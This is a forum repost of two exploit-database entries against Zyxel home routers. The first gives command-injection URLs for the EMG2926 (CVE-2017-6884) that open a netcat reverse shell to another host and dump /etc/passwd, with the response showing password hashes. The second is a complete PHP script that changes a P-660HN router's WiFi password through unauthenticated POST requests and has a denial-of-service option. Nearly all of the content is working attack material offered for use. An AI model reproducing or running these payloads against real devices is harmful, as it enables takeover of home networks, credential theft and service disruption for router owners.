Search the Community

[Sursa: https://www.exploit-db.com/exploits/41782/?rss ] # Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection # Date: 2017-04-02 # Exploit Author: Fluffy Huffy (trevor Hough) # Vendor Homepage: www.zyxel.com # Version: EMG2926 - V1.00(AAQT.4)b8 # Tested on: linux # CVE : CVE-2017-6884 OS command injection vulnerability was discovered in a commonly used home router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools specify the nslookup function. A malicious user may exploit numerous vectors to execute arbitrary commands on the router. Exploit (Reverse Shell) https://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button& ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p Exploit (Dump Password File) Request GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup Accept-Language: en-US,en;q=0.8 Cookie: csd=9; sysauth=<Clipped> Connection: close Response (Clipped) <textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash admin:$1$<Clipped>:0:0:admin:/:/bin/fail

<?php /* Exploit Title : ZYXEL remote configuration editor / Web Server DoS Date : 23 April 2015 Exploit Author : Koorosh Ghorbani Site : http://8thbit.net/ Vendor Homepage : http://www.zyxel.com/ Platform : Hardware Tested On : ZyXEL P-660HN-T1H_IPv6 Firmware Version: 1.02(VLU.0) -------------------------- Unattended remote access -------------------------- ZYXEL Embedded Software does not check Cookies And Credentials on POST method so attackers could changes settings and view pages with post method . -------------------------- DoS Web Server -------------------------- sending empty Post to admin pages will crash internal web server and router needs to hard reset . */ $banner = " ___ _______ _ ____ _ _______ \r\n" . " / _ \__ __| | | _ \(_)__ __|\r\n" ." | (_) | | | | |__ | |_) |_ | | \r\n" ." > _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n"; print $banner; function Post($packet,$host) { try { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $host); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $packet); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"); curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($curl); curl_close($curl); return $result; }catch (Exception $e ){ echo $e->getMessage(); return "" ; } } if(sizeof($argv) < 3) { print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n"; exit(1); } $host = $argv[1]; $password = urlencode($argv[2]); $packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ; $target = "http://$host/cgi-bin/WLAN_General.asp"; if(strlen(Post($packet,$target)) > 0){ print "Seems Changed !"; }else{ print "Humm , No Chance !"; } //DoS : Post("",$target) ; ?> Source: http://packetstorm.wowhacker.com/1504-exploits/zyxel-dos.txt